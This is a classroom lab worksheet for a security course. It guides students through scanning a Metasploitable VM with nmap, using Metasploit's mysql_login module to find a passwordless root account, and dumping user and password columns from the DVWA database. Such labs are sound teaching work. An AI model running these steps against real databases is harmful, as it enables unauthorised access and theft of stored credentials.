Database Attack Lab
Class: SEC6070
Name:
Date:
This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.
1. If Metasploitable isn’t already running launch the Metasploitable VM.
2. At the user logon prompt type: msfadmin
3. At the password prompt type: msfadmin
4. Type: ifconfig
a. Paste your screenshot here:-
5. Record the IP address here: This is your RHOST or ‘remote host’
Now switch to Kali.
6. Open a shell by clicking on the black box next to the word “Places”.
7. Type: service postgresql start
a. Paste your screenshot here:-
8. Type: msfconsole
a. Paste your screenshot here:-
9. Scan your target for database technologies. Try to identify running database services on your target’s ports.
a. Type: nmap x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)
b. Paste your screenshot here:-
Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.
10. Metasploit has multiple MySQL exploits.
a.Type: search mysql
b. Paste your screenshot here:-
11. Type: use auxiliary/scanner/mysql/mysql_login
12. Type: info
13. Type: set rhosts x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)
14. Type: set username root
15. Type: set stop_on_success true
16. Let’s confirm the changes you made took. Type: info
17. a. Paste your screenshot here:-
18. Type: exploit
a. Paste your screenshot here:-
You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.
19. Open a new shell by clicking on the black box to the right of the word “Places”.
20. Type: mysql –h x.x.x.x –u root (substitute x.x.x.x for the ip address of your REMOTE host)
a. Paste your screenshot here:-
21. Type: show databases;
a. Paste your screenshot here:-
22. Let’s pick a database and explore it. Type: use dvwa;
a. Paste your screenshot here:-
23. Now that we’ve picked a database let’s view the tables. Type: show tables;
a. Paste your screenshot here:-
24. Let’s see what data is being held in this table. Type: show columns from users;
a. Paste your screenshot here:-
25. Columns of interest are “user” and “password”. Type: select user, password from users;
a. Paste your screenshot here:-
26. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.
Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.
W
